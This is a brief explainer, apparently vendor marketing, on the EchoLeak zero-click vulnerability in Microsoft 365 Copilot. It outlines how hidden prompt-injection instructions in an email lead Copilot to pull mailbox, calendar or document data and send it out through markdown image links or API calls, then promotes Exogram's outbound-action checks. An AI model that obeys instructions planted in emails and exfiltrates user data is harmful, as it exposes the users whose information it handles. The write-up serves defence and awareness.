What is the EchoLeak Microsoft Copilot vulnerability?

EchoLeak (CVE-2025-32711) is a zero-click data exfiltration vulnerability in Microsoft 365 Copilot that allowed attackers to steal sensitive data simply by sending a crafted email — no user interaction required.

The EchoLeak attack chain exploited Copilot's integration with email:

1. Attacker sends a specially crafted email containing hidden prompt injection instructions
2. When the victim's Copilot processes emails (even in the background), it follows the injected instructions
3. Copilot extracts sensitive data from the user's mailbox, calendar, or documents
4. The extracted data is exfiltrated via markdown-rendered images or API calls to external servers
5. The victim never clicks anything — it's completely zero-click

This is indirect prompt injection at enterprise scale. The agent (Copilot) trusted data from an external source (email) and followed malicious instructions embedded within it.

Exogram prevents EchoLeak-style attacks through outbound action governance. Every API call, every data transmission, every file operation is validated against deterministic policy rules. Even if injection succeeds at the model level, the exfiltration attempt is blocked at the execution boundary.